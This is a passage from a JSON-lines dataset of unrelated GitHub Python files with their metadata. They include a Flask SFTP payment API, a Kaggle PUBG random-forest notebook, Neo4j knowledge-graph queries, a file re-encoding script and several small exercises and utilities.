Python\n=======================================================\n\nDocumentation is available in the docstrings.\n\nContents\n--------\nReadIM is a wrapper for for C-code provided by LaVision as the core\nfunctionality. Additional functions are provided to load array data into memory\nwith access to data as numpy arrays and attributes as dictionaires.\n\"\"\"\nfrom __future__ import division, print_function, absolute_import\n\nfrom . import extra\nfrom . import core\n# collect buffer fommats together\nBUFFER_FORMATS = {}\nfor s in dir(core):\n if s.find('BUFFER_FORMAT') == 0:\n BUFFER_FORMATS[getattr(core, s)] = s\n\n# collect error codes\nERROR_CODES = {}\nfor s in dir(core):\n if s.find('IMREAD_ERR') == 0:\n ERROR_CODES[getattr(core,s)] = s\n\ndel(s)\nfrom .core import (BufferType, BufferScaleType, AttributeList,\n CreateBuffer, DestroyBuffer, DestroyAttributeList,\n ReadIM7, WriteIM7, GetVectorComponents, SetBufferScale,\n SetAttribute)\n\nfrom .extra import *","repo_name":"paugier/readim","sub_path":"ReadIM/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1073,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"17403449506","text":"import json\nimport datetime\nimport os\nfrom flask import request, session, escape\nfrom flask_jwt import jwt_required\nfrom flask_restful import Resource, reqparse\nfrom models.item import ItemModel, Sftp, test_write, recursive_ftp\nfrom models.user import UserModel\n\nclass Item(Resource):\n parser = reqparse.RequestParser()\n parser.add_argument(\"transfer\",\n type=dict,\n required=True,\n help=\"There is a lack of information in the transfer!\"\n )\n\n\n parser.add_argument('type',\n type=str,\n required=True,\n help=\"This field cannot be left blank!\"\n )\n\n @jwt_required()\n def get(self):\n request_data = Item.parser.parse_args().get(\"transfer\", None)\n checkCode = request_data['checkCode']\n item = ItemModel.find_by_name(checkCode)\n\n if item:\n user = UserModel.find_by_id(1).json()\n print(user)\n username, password = user['username'], user['password']\n host, port = user['host'], user['port']\n\n connection = Sftp(username, password, host, port)\n\n if checkCode in str(recursive_ftp(connection.sftp())):\n item.status = 'Processing'\n item.save_to_db()\n return item.json()\n else:\n return {'message': 'Item not found'}, 404\n\n @jwt_required()\n def post(self):\n x = datetime.datetime.now()\n date = str(x.day) + '-' + x.strftime(\"%b\") + '-' + str(x.year)\n\n request_data = Item.parser.parse_args()\n data = Item.parser.parse_args().get('transfer', None)\n\n if ItemModel.find_by_name(data['checkCode']):\n return {'message': \"An item with checkCode:'{}' already exists.\".format(\n data['checkCode'])}, 400 # something when wrong with the request\n\n item = ItemModel(\n data['intermediateIBAN'],\n data['checkCode'],\n data['senderIBAN'],\n data['senderName'],\n data['receiverIBAN'],\n data['receiverName'],\n data['description'],\n data['amount'],\n data['currencyCode'],\n request_data['type'],\n \"Received\", # initial status\n ) # {'name': name, 'price': request_data['price']}\n\n try:\n item.save_to_db() # ItemModel.insert(item)\n try:\n item = ItemModel.find_by_name(data['checkCode'])\n print(f\"Item:{item.json()}\")\n\n user = UserModel.find_by_id(1).json()\n print(user)\n username, password = user['username'], user['password']\n host, port = user['host'], user['port']\n connection = Sftp(username, password, host, port)\n\n sftp = connection.sftp()\n\n try:\n test_write(sftp, \"PaySafe_transfer_\"+date+\"_\"+data['checkCode']+\".csv\", str(item.json()).replace(\"Received\", \"Sent\"))\n item.status = \"Sent\"\n item.save_to_db()\n except ValueError:\n return {\"message\": \"No able to connect to the SFTP. Try later.\"}, 500\n # else:\n # return {\"message\": \"The file doesn't exists.\"}, 500 # internal server error\n\n except ValueError:\n item = ItemModel.find_by_name(data['checkCode'])\n item.status = \"Stiff\"\n item.save_to_db()\n return {\"message\": \"An error occurred transferring the item to SFTP.\"}, 500 # internal server error\n except ValueError:\n return {\"message\": \"An error occurred inserting the item.\"}, 500 # internal server error\n\n return item.json(), 201\n\n @jwt_required()\n def delete(self):\n request_data = Item.parser.parse_args().get(\"transfer\", None)\n checkCode = request_data['checkCode']\n item = ItemModel.find_by_name(checkCode)\n\n if item:\n item.delete_from_db()\n\n return {'message': 'Item deleted.'}\n #\n # # @jwt_required()\n # def put(self, name):\n # # request_data = request.get_json()\n # request_data = Item.parser.parse_args()\n #\n # item = ItemModel.find_by_name(name)\n #\n # if item is None:\n # item = ItemModel(name, request_data['price'], request_data['store_id'])\n # else:\n # item.price = request_data['price']\n # item.store_id = request_data['store_id']\n # item.save_to_db()\n #\n # return item.json()\n\n\nclass ItemList(Resource):\n def get(self):\n # return {'items': list(map(lambda x: x.json(), ItemModel.query.all()))}\n return {'items': [item.json() for item in ItemModel.query.all()]}\n\n\n","repo_name":"MelinteB-UPR/Paysafe","sub_path":"resources/item.py","file_name":"item.py","file_ext":"py","file_size_in_byte":4866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"70912126044","text":"\n\n\n## arr represents daily stock prices..\n\n## return the max profilt\n\n\ndef buy_sell_once(arr):\n m_p = 0\n prev = 0\n res = []\n for i in range(1,len(arr)):\n curr = max(prev+arr[i]-arr[i-1],arr[i]-arr[i-1])\n prev = curr\n m_p = max(curr,m_p)\n res.append(curr) ## res.append(max(0,curr)) will also work....\n return [0]+res\n\n\ndef buy_sell_twice(arr):\n x = buy_sell_once(arr)\n y = buy_sell_once([-i for i in reversed(arr)])\n print(x,y)\n res = [x[i]+y[i+1] if i \")\n\n try:\n shopping_list_items.remove(what_to_remove)\n except ValueError:\n pass\n\n show_items()\n\n\ndef add_item(new_item):\n show_items()\n\n if len(shopping_list_items):\n position = input(\"Where do you want to put {} \\n\"\n \"Press Enter to add it to the end of the list \\n\"\n \"> \".format(new_item)\n )\n else:\n position = 0\n\n try:\n position = abs(int(position))\n except ValueError:\n position = None\n if position is not None:\n shopping_list_items.insert(position-1, new_item)\n else:\n # add new items to our list\n shopping_list_items.append(new_item)\n\n\nshow_help()\n\nwhile True:\n\n # ask for new items\n new_item = input(\"> \")\n\n # how type DONE to quit the app\n if new_item.upper() == 'DONE' or new_item.upper() == 'QUIT':\n break\n elif new_item.upper() == 'HELP':\n show_help()\n continue\n elif new_item.upper() == 'SHOW':\n show_items()\n continue\n elif new_item.upper() == 'REMOVE':\n remove_from_list()\n elif new_item == \"\":\n print(\"Cannot add an empty item to the list, please enter a valid item\")\n continue\n else:\n # adds new items\n add_item(new_item)\n\n show_items()\n\n\n\n","repo_name":"danielmaia19/Python-Basics","sub_path":"Shopping_List_App3.py","file_name":"Shopping_List_App3.py","file_ext":"py","file_size_in_byte":2158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74448077083","text":"# This Python 3 environment comes with many helpful analytics libraries installed\n# It is defined by the kaggle/python docker image: https://github.com/kaggle/docker-python\n# For example, here's several helpful packages to load in \n\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\n\n# Input data files are available in the \"../input/\" directory.\n# For example, running this (by clicking run or pressing Shift+Enter) will list the files in the input directory\n\nimport os\nprint(os.listdir(\"../input\"))\n\n# Any results you write to the current directory are saved as output.\n# numpy and pandas for data manipulation\nimport numpy as np\nimport pandas as pd \n\n# sklearn preprocessing for dealing with categorical variables\nfrom sklearn.preprocessing import LabelEncoder\n\n# File system manangement\nimport os\n\n# Suppress warnings \nimport warnings\nwarnings.filterwarnings('ignore')\n\n# matplotlib and seaborn for plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n# print out files\nprint(os.listdir(\"../input/\"))\n\n# training data\n\ntraindata = pd.read_csv('../input/train_V2.csv')\ntraindata.head()\n\n# testing data\n\ntestdata = pd.read_csv('../input/test_V2.csv')\ntestdata.head()\ndef missing_values_table(df):\n # Total missing values\n mis_val = df.isnull().sum()\n \n # Percentage of missing values\n mis_val_percent = 100 * df.isnull().sum() / len(df)\n \n # Make a table with the results\n mis_val_table = pd.concat([mis_val, mis_val_percent], axis=1)\n \n # Rename the columns\n mis_val_table_ren_columns = mis_val_table.rename(\n columns = {0 : 'Missing Values', 1 : '% of Total Values'})\n \n # Sort the table by percentage of missing descending\n mis_val_table_ren_columns = mis_val_table_ren_columns[\n mis_val_table_ren_columns.iloc[:,1] != 0].sort_values(\n '% of Total Values', ascending=False).round(1)\n \n # Print some summary information\n print (\"Your selected dataframe has \" + str(df.shape[1]) + \" columns.\\n\" \n \"There are \" + str(mis_val_table_ren_columns.shape[0]) +\n \" columns that have missing values.\")\n \n # Return the dataframe with missing information\n return mis_val_table_ren_columns\nmissing_values = missing_values_table(traindata)\nmissing_values\n\ntraindata[traindata['winPlacePerc'].isnull()]\ntraindata.drop(2744604, inplace= True)\ntraindata = pd.get_dummies(traindata, columns = ['matchType'])\nmatchType_encoding = traindata.filter(regex='matchType')\nmatchType_encoding.head()\n# Turn groupId and match Id into categorical types\ntraindata['groupId'] = traindata['groupId'].astype('category')\ntraindata['matchId'] = traindata['matchId'].astype('category')\n\n# Get category coding for groupId and matchID\ntraindata['groupId_cat'] = traindata['groupId'].cat.codes\ntraindata['matchId_cat'] = traindata['matchId'].cat.codes\n\n# Get rid of old columns\ntraindata.drop(columns=['groupId', 'matchId'], inplace=True)\n\n# Lets take a look at our newly created features\ntraindata[['groupId_cat', 'matchId_cat']].head()\ntraindata.drop(columns = ['Id'], inplace=True)\ntraindata['totalDistance'] = traindata['walkDistance'] + traindata['rideDistance'] + traindata['swimDistance']\ntraindata['headshotRate'] = traindata['headshotKills']/traindata['kills']\ntraindata['headshotRate'] = traindata['headshotRate'].fillna(0)\ntraindata['playersJoined'] = traindata.groupby('matchId_cat')['matchId_cat'].transform('count')\n\n# Create normalized features\ntraindata['killsNorm'] = traindata['kills']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['damageDealtNorm'] = traindata['damageDealt']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['maxPlaceNorm'] = traindata['maxPlace']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['matchDurationNorm'] = traindata['matchDuration']*((100-traindata['playersJoined'])/100 + 1)\ntraindata['healsandboosts'] = traindata['heals'] + traindata['boosts']\ntraindata['killsWithoutMoving'] = ((traindata['kills'] > 0) & (traindata['totalDistance'] == 0))\n\n\n# Check players who kills without moving\ndisplay(traindata[traindata['killsWithoutMoving'] == True].shape)\ntraindata[traindata['killsWithoutMoving'] == True].head(10)\n# Remove outliers\ntraindata.drop(traindata[traindata['killsWithoutMoving'] == True].index, inplace=True)\n# Drop roadKill 'cheaters'\ntraindata.drop(traindata[traindata['roadKills'] > 10].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['kills'] > 30].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['longestKill'] >= 1000].index, inplace=True)\ntraindata.drop(traindata[traindata['walkDistance'] >= 10000].index, inplace=True)\ntraindata.drop(traindata[traindata['rideDistance'] >= 20000].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['swimDistance'] >= 2000].index, inplace=True)\ntraindata.drop(traindata[traindata['weaponsAcquired'] >= 80].index, inplace=True)\n# Remove outliers\ntraindata.drop(traindata[traindata['heals'] >= 40].index, inplace=True) \nsample = 500000\ndf_sample = traindata.sample(sample)\n# Split sample into training data and target variable\ndf = df_sample.drop(columns = ['winPlacePerc']) #all columns except target\ny = df_sample['winPlacePerc'] # Only target variable\nfrom sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.12, random_state=42)\n\nfrom sklearn.metrics import mean_absolute_error\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Function to print the MAE (Mean Absolute Error) score\n# This is the metric used by Kaggle in this competition\ndef print_score(m : RandomForestRegressor):\n res = ['mae train: ', mean_absolute_error(m.predict(X_train), y_train), \n 'mae val: ', mean_absolute_error(m.predict(X_test), y_test)]\n if hasattr(m, 'oob_score_'): res.append(m.oob_score_)\n print(res)\nm1 = RandomForestRegressor(n_estimators=40, min_samples_leaf=3, max_features='sqrt',\n n_jobs=-1)\nm1.fit(X_train, y_train)\nprint_score(m1)\n# provides a way to analyze feature importance \n#takes in a model and a dataframe and pulls the importances and make them into a seperate table \ndef rf_feat_importance(m, df):\n return pd.DataFrame({'cols':df.columns, 'imp':m.feature_importances_}\n ).sort_values('imp', ascending=False)\n\n\nfi = rf_feat_importance(m1, df); fi[:10]\nto_keep = fi[fi.imp>0.005].cols\nprint('Significant features: ', len(to_keep))\nto_keep\ndf_keep = df[to_keep].copy()\nX_train, X_test, y_train, y_test = train_test_split(df, y, test_size=0.12, random_state=42)\n\nm2 = RandomForestRegressor(n_estimators=80, min_samples_leaf=3, max_features='sqrt',\n n_jobs=-1)\nm2.fit(X_train, y_train)\nprint_score(m2)\nfrom sklearn import metrics\nfrom scipy.cluster import hierarchy as hc\nfrom fastai.imports import *\n\ncorr = np.round(scipy.stats.spearmanr(df_keep).correlation, 4)\ncorr_condensed = hc.distance.squareform(1-corr)\nz = hc.linkage(corr_condensed, method='average')\nfig = plt.figure(figsize=(14,10))\ndendrogram = hc.dendrogram(z, labels=df_keep.columns, orientation='left', leaf_font_size=16)\nplt.plot()\n# Prepare data\nval_perc_full = 0.12 # % to use for validation set\nn_valid_full = int(val_perc_full * len(traindata)) \nn_trn_full = len(traindata)-n_valid_full\ndf_full = traindata.drop(columns = ['winPlacePerc']) # all columns except target\ny = traindata['winPlacePerc'] # target variable\ndf_full = df_full[to_keep] # Keep only relevant features\nX_train, X_test, y_train, y_test = train_test_split(df_full, y, test_size=0.12, random_state=42)\n\n# Check dimensions of data\nprint('Sample train shape: ', X_train.shape, \n 'Sample target shape: ', y_train.shape, \n 'Sample validation shape: ', X_test.shape)\nm3 = RandomForestRegressor(n_estimators=70, min_samples_leaf=3, max_features=0.5,\n n_jobs=-1)\nm3.fit(X_train, y_train)\nprint_score(m3)\n# Add engineered features to the testdata set\ntestdata['totalDistance'] = testdata['walkDistance'] + testdata['rideDistance'] + testdata['swimDistance']\ntestdata['headshotRate'] = testdata['headshotKills']/testdata['kills']\ntestdata['headshotRate'] = testdata['headshotRate'].fillna(0)\ntestdata['playersJoined'] = testdata.groupby('matchId')['matchId'].transform('count')\n\n# Create normalized features\ntestdata['killsNorm'] = testdata['kills']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['damageDealtNorm'] = testdata['damageDealt']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['maxPlaceNorm'] = testdata['maxPlace']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['matchDurationNorm'] = testdata['matchDuration']*((100-testdata['playersJoined'])/100 + 1)\ntestdata['healsandboosts'] = testdata['heals'] + testdata['boosts']\n\ntestdata['killsWithoutMoving'] = ((testdata['kills'] > 0) & (testdata['totalDistance'] == 0))\n\n\n# Turn groupId and match Id into categorical types\ntestdata['groupId'] = testdata['groupId'].astype('category')\ntestdata['matchId'] = testdata['matchId'].astype('category')\n\n# Get category coding for groupId and matchID\ntestdata['groupId_cat'] = testdata['groupId'].cat.codes\ntestdata['matchId_cat'] = testdata['matchId'].cat.codes\n\n# Remove irrelevant features from the testdata set\ntest_pred = testdata[to_keep].copy()\n\n# Fill NaN with 0 (temporary)\ntest_pred.fillna(0, inplace=True)\ntest_pred.head()\n\n# Make submission ready for Kaggle\n# We use our final Random Forest model (m3) to get the predictions\npredictions = np.clip(a = m3.predict(test_pred), a_min = 0.0, a_max = 1.0)\npred_df = pd.DataFrame({'Id' : testdata['Id'], 'winPlacePerc' : predictions})\n\n# Create submission file\npred_df.to_csv(\"submission.csv\", index=False)","repo_name":"aorursy/new-nb-6","sub_path":"rgwegwegwe_first-submission.py","file_name":"rgwegwegwe_first-submission.py","file_ext":"py","file_size_in_byte":9834,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"27614616939","text":"import unittest\nfrom datetime import datetime, timedelta\n\nimport constants as c\nfrom utils.quartz import Scheduler\nfrom utils.common import TimeParser\n\n\nclass TestingQuartzSchedulerIntegration(unittest.TestCase):\n\n def _get_sample(self) -> None:\n samples = 3\n dups = 2\n interval = 2\n\n samples = [\n datetime.strftime(datetime.today() + timedelta(seconds=(interval + (x if x >= dups else 1))), c.TIME_FORMAT)\n for x in range(samples)\n ]\n\n return TimeParser().parse(','.join(samples))\n\n def test_job_scheduler_without_time_slots(self):\n\n scd = Scheduler()\n scd.run('', None)\n\n self.assertEqual(len(scd.s.queue), 0, \"It should not schedule any job\")\n\n def test_job_scheduler_with_time_slot_and_no_job(self):\n\n scd = Scheduler()\n scd.run(self._get_sample(), None)\n\n self.assertEqual(len(scd.s.queue), 0, \"It should not schedule any job\")\n\n def test_job_scheduler_with_time_slot_and_with_job(self):\n scd = Scheduler()\n scd.run(self._get_sample(), lambda: True)\n\n self.assertEqual(len(scd.events), 3, \"It should schedule 3 jobs\")\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"iamomin/ip-checker","sub_path":"tests/integration/test_int_quartz.py","file_name":"test_int_quartz.py","file_ext":"py","file_size_in_byte":1211,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"35787348096","text":"# File: utils.py \r\n# Date: 10 gen 16\r\n# Note: modulo di funzioni utilities \r\n\r\n# dizionario di conversione degli operatori: da formato editor/GUI\r\n# a formato testuale per l'engine:\r\nopconv = {\r\n '+' : '+',\r\n '=' : '=',\r\n '≠' : '!=',\r\n '<' : '<',\r\n '>' : '>',\r\n '≤' : '<=',\r\n '≥' : '=',\r\n '∧' : 'and',\r\n '∨' : 'or',\r\n '¬' : 'not',\r\n '∩' : 'inters',\r\n '∪' : 'union',\r\n '÷' : 'division',\r\n '∸' : 'difference',\r\n 'π' : 'projection',\r\n 'σ' : 'selection',\r\n 'ρ' : 'rename',\r\n '⨝' : 'join',\r\n '⟕' : 'ljoin',\r\n '⟖' : 'rjoin',\r\n '⟗' : 'fjoin',\r\n #'←' : ':=',\r\n '→' : '->',\r\n '(' : '(',\r\n ')' : ')',\r\n '⦇' : '[',\r\n '⦈' : ']'\r\n }\r\n\r\ndebugmode = False\r\n\r\ndef setDebug(mode):\r\n #print('settato debugmode =',mode)\r\n global debugmode\r\n debugmode = mode\r\n \r\ndef debug(msg):\r\n global debugmode\r\n if debugmode:\r\n print('DEBUG:',msg)\r\n\r\n# converte una stringa con caratteri speciali in stringa ASCII\r\n# usando le definizioni del dizionario dello Scanner\r\n# in modo da rendere s compatibile con il formato dell'engine RA\r\ndef conv(s):\r\n # trasformazione dell'assegnazione\r\n if s.find('←') >= 0:\r\n s = 'set ' + s.replace('←',' ')\r\n # trasformazione dei caratteri operatore \r\n ris = ''\r\n for c in s:\r\n if c in opconv:\r\n #ris += opconv[c]\r\n if opconv[c][0].isalpha(): # carattere iniziale dell'operatore\r\n ris += ' '+opconv[c]+' '\r\n else:\r\n ris += opconv[c]\r\n else:\r\n ris += c\r\n return ris\r\n\r\n#----------------------------------------------------------------\r\nif __name__ == \"__main__\":\r\n s = 'T1←R⨝⦇Sigla=\\'BL\\'⦈S⟕REPARTO∸x'\r\n t = conv(s)\r\n print('T =',t) \r\n","repo_name":"thadumi/radb","sub_path":"bin/gui/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2027,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"18831296243","text":"import logging\n\nfrom .models import FileParticipant\nfrom seahub.tags.models import FileUUIDMap\n\nlogger = logging.getLogger(__name__)\n\n\ndef list_file_participants(repo_id, path):\n \"\"\" return participants username list\n \"\"\"\n username_list = []\n try:\n file_uuid = FileUUIDMap.objects.get_or_create_fileuuidmap_by_path(repo_id, path, False)\n\n participant_queryset = FileParticipant.objects.get_participants(file_uuid)\n for participant in participant_queryset:\n username_list.append(participant.username)\n except Exception as e:\n logger.error(e)\n\n return username_list\n","repo_name":"haiwen/seahub","sub_path":"seahub/file_participants/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":506,"dataset":"github-code","pt":"86"} +{"seq_id":"3675881977","text":"import os\nimport pathlib\nimport shutil\n# local\nred = \"\\033[131m\"\noff = \"\\033[00m\"\n\nsubfix = ['.cpp','.hpp','.h','.c','.cu','.cuh']\n\nif(os.system(\"iconv --version\") != 0):\n print(\"[iconv] not found, please install it first\")\n exit(1)\n\n\nprint(\"traverse root directory:\", pathlib.Path(\".\").absolute())\n\nfail_list = []\nfor root, dirs, files in os.walk(\".\"):\n path = root.split(os.sep)\n print((len(path) - 1) * '-', os.path.basename(root))\n for file in files:\n print(len(path) * '-', file)\n s = pathlib.Path(file).suffix\n if(s in subfix):\n fullname = os.path.join(root, file)\n fullnametemp = fullname + \".tmp\"\n if(os.system(\"iconv -t UTF-8 \" + fullname + \" > \" + fullnametemp) == 0):\n shutil.copy(fullnametemp, fullname)\n else:\n fail_list.append( pathlib.Path(fullname).absolute())\n os.remove(fullnametemp)\n\nfor fail in fail_list:\n print(red, \"fail to convert:\", fail, off)\n\nif(len(fail_list) == 0):\n print(\"all success!\")","repo_name":"MuGdxy/muda","sub_path":"scripts/encode_files.py","file_name":"encode_files.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":68,"dataset":"github-code","pt":"86"} +{"seq_id":"33436516635","text":"from neo4j import GraphDatabase\n\n\nclass KnowledgeGraph(object):\n def __init__(self, uri, user, password):\n self._driver = GraphDatabase.driver(uri, auth=(user, password))\n\n def close(self):\n self._driver.close()\n\n def update_kg(self, kg):\n with self._driver.session() as session:\n session.write_transaction(\n self._create_news, kg['SOURCE'], kg['NEWS'],\n kg['DATE'].strftime('%Y-%m-%d'), kg['RWORDS_COUNT']\n )\n for en, v in kg['ENs'].items():\n session.write_transaction(\n self._create_en, kg['NEWS'], en, v['COUNT']\n )\n for w, j in v['RWORDS'].items():\n session.write_transaction(\n self._create_word, en, w, j['_POS'],\n kg['NEWS']['uri'], j['sent']\n )\n\n def get_en_sentiment(self, en):\n with self._driver.session() as session:\n return session.write_transaction(self._get_en_sentiment, en)\n\n def get_news(self):\n with self._driver.session() as session:\n return session.write_transaction(self._get_news)\n\n def get_sentiment_by_en(self, date=None):\n with self._driver.session() as session:\n return session.write_transaction(self._get_sentiment_by_en,\n date=date)\n\n def get_related_news_by_date(self, date):\n with self._driver.session() as session:\n return session.write_transaction(self._get_related_news_by_date,\n date=date)\n\n def get_sentiments_magic_method(self, date):\n with self._driver.session() as session:\n return session.write_transaction(self._get_sentiments_magic_method,\n date=date)\n\n def get_data_by_source(self, date):\n with self._driver.session() as session:\n return session.write_transaction(self._get_data_by_source,\n date=date)\n\n @staticmethod\n def _get_news(tx):\n cmd = (\n 'MATCH (n:NEWS)'\n 'RETURN n'\n )\n return tx.run(cmd).value()\n\n @staticmethod\n def _create_news(tx, source, news, date, rw_c):\n cmd = (\n 'MERGE (s:SOURCE {uri: $source })'\n 'MERGE (n:NEWS {uri: $n_uri , title: $n_title, rw_count: $rw_c})'\n 'MERGE (d:DATE {value: $date })'\n 'CREATE (s)-[r:PUBLISHES]->(n)-[:ON]->(d)'\n 'return r'\n )\n return tx.run(\n cmd, source=source, n_uri=news['uri'], n_title=news['title'],\n date=date, rw_c=rw_c)\n\n @staticmethod\n def _create_en(tx, news, en, count):\n cmd = \"\"\"\n MERGE (n:NEWS {uri: $n_uri })\n MERGE (e:EN {uri: $en })\n CREATE (n)-[r:MENTIONS {count: $count}]->(e)\n return r\n \"\"\"\n return tx.run(cmd, n_uri=news['uri'], en=en, count=count)\n\n @staticmethod\n def _create_word(tx, en, word, _POS, news_id, sent):\n cmd = \"\"\"\n MERGE (e:EN {uri: $en })\n MERGE (w:WORD {lemma: $word, _POS: $_POS})\n CREATE (e)-[r:SAYS {news_id: $news_id, sent: $sent } ]->(w)\n return r\n \"\"\"\n return tx.run(cmd, en=en, word=word, _POS=_POS, news_id=news_id,\n sent=sent)\n\n @staticmethod\n def _get_sentiment_by_en(tx, date):\n if date:\n cmd = (\n \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)\"\n \"WITH collect(n.uri) as uris\"\n \"MATCH p=(e:EN)-[r:SAYS]-(w:WORD)\"\n \"WHERE r.news_id in uris\"\n \"RETURN e.uri as en, avg(reduce(totalSent = 1, \"\n \" s IN r.sent| totalSent + s) / size(r.sent)) as sent\"\n )\n return tx.run(cmd, date=date).data()\n cmd = (\n \"MATCH p=(e:EN)-[r:SAYS]-(w:WORD)\"\n \"RETURN e.uri as en, avg(reduce(totalSent = 1, \"\n \" s IN r.sent| totalSent + s) / size(r.sent)) as sent\"\n )\n return tx.run(cmd).data()\n\n @staticmethod\n def _get_related_news_by_date(tx, date):\n cmd = (\n \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)\"\n \"RETURN n\"\n )\n return tx.run(cmd, date=date).data()\n\n @staticmethod\n def _get_sentiments_magic_method(tx, date):\n cmd = (\n \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)-\"\n \"[:PUBLISHES]-(s:SOURCE) \"\n \"WITH n, s.uri as s \"\n \"MATCH (n)-[p:MENTIONS]-(e:EN)-[m:SAYS {news_id: n.uri}]-(w:WORD) \"\n \"WITH n, s, p, e.uri as e, w as w, \"\n \" reduce(t = 0, n IN m.sent | t + n) as sents, \"\n \" size(m.sent) as s_c \"\n \"WITH n, s, e, {FREQ: p.count, RWORDS: apoc.map.fromLists(\"\n \" collect(w.lemma), collect([sents / s_c, s_c, w._POS]))} as x \"\n \"WITH n, s, apoc.map.fromLists(collect(e), collect(x)) as ents \"\n \"WITH n.uri as n, collect({SOURCE: s, ENs: ents, \"\n \" RWORDS_COUNT: n.rw_count})[0] as x \"\n \"RETURN apoc.map.fromLists(collect(n), collect(x)) as s \"\n )\n return tx.run(cmd, date=date).data()[0]['s']\n\n @staticmethod\n def _get_data_by_source(tx, date):\n cmd = (\n \"MATCH (d:DATE {value: $date})-[:ON]-(n:NEWS)- \"\n \"[:PUBLISHES]-(s:SOURCE) \"\n \"WITH n, s.uri as s \"\n \"MATCH (n)-[p:MENTIONS]-(e:EN)-[m:SAYS {news_id: n.uri}]-(w:WORD) \"\n \"WITH s, p, e.uri as e, w as w, \"\n \" reduce(t = 0, n IN m.sent | t + n) as sents, \"\n \" size(m.sent) as s_c \"\n \"WITH s, e, {RWORDS: apoc.map.fromLists( \"\n \" collect(w.lemma), collect([sents / s_c, s_c, w._POS]))} as x \"\n \"WITH s, apoc.map.fromLists(collect(e), collect(x)) as ents \"\n \"RETURN apoc.map.fromLists(collect(s), collect(ents)) as s\"\n )\n return tx.run(cmd, date=date).data()[0]['s']\n","repo_name":"URJCDSLab/KRAKEN-SND","sub_path":"knowledge-graph-builder/fake_news/neo4j_conn.py","file_name":"neo4j_conn.py","file_ext":"py","file_size_in_byte":6090,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"74769848925","text":"#! /usr/bin/python\n\nfrom pylab import *\nfrom sys import argv,exit,stdout\nimport optparse as op\nimport matplotlib.pyplot as plt\nimport numpy as np\nfrom interp import *\nfrom read_iterdb_file import *\nimport sys\n\nsys.stdout = open('lvlw.txt', 'w')\n\nparser = op.OptionParser()\noptions,args = parser.parse_args()\nc_buffer_x = float(args[0])\nbuffer_size = float(args[1])\nphysW = float(args[2])\nfile1 = args[3]\n\nl_buffer_x = float(c_buffer_x) - physW*float(buffer_size)\nr_buffer_x = float(c_buffer_x) + physW*float(buffer_size)\n\n#pdata=np.genfromtxt('p_info.dat')\n#pdata=np.genfromtxt(prof_file_name)\n#rhot=pdata[:,0]\n#te=pdata[:,2]\n\nrhot, te, ti1, ne1, ni1, nb1, vrot1 = read_iterdb_file(file1)\ne = 1.6*10**(-19)\n\nrhot_fine = linspace(rhot[0],rhot[-1],10*len(rhot))\nte_fine = interp(rhot,te,rhot_fine)\n\nl_ind = np.argmin(abs(rhot_fine - float(l_buffer_x)))\nc_ind = np.argmin(abs(rhot_fine - float(c_buffer_x)))\nr_ind = np.argmin(abs(rhot_fine - float(r_buffer_x)))\n\nte_l = te_fine[l_ind]\nte_c = te_fine[c_ind]\nte_r = te_fine[r_ind]\n\nlv = 3*np.sqrt(te_l/te_c)\nlw = lv**2\n\nprint('lv = ', lv)\nprint('te_l = ', te_l*0.001/e)\nprint('te_c = ', te_c*0.001/e)\nprint('te_r = ', te_r*0.001/e)\nprint('lw = ', lw)\nprint('buffer', l_buffer_x, r_buffer_x)\n\nnv = 48*np.sqrt(te_l/te_r)\nnw = 16*te_l/te_r\n\nprint('nv = ', nv)\nprint('nw = ', nw)\n\n","repo_name":"xingliuUT/extract_info_from_ITERDB","sub_path":"calc_lv.py","file_name":"calc_lv.py","file_ext":"py","file_size_in_byte":1322,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"86"} +{"seq_id":"43715299952","text":"from urllib.request import urlopen, urlretrieve\nimport re,logging,sys,ctypes,os,datetime\nfrom bs4 import BeautifulSoup\nlogging.basicConfig(format = u'%(filename)s[LINE:%(lineno)d]# %(levelname)-8s [%(asctime)s] %(message)s', filename = u'errors.txt')\n\ndef StopProgram(message):\n logging.error(message)\n ctypes.windll.user32.MessageBoxA(0, message, b'Error', 0)\n sys.exit()\n\nurl = \"http://apod.nasa.gov/apod/\"\nto_find = \"IMG SRC=\"\nhtml = str(urlopen(url).read())\nhtml = html.replace('\\\\n',' ')\nsoup = BeautifulSoup(html, 'html.parser')\ntry:\n image_url = soup.img.get('src')\nexcept:\n StopProgram(b'Something\\'s gone wrong! Couldn\\'t find URL of the image o.O')\nfull_url = url + image_url\ndestination = 'wallpaper' + full_url[-4:]\nif '.' not in destination:\n StopProgram(b'Something\\'s gone wrong! Couldn\\'t find 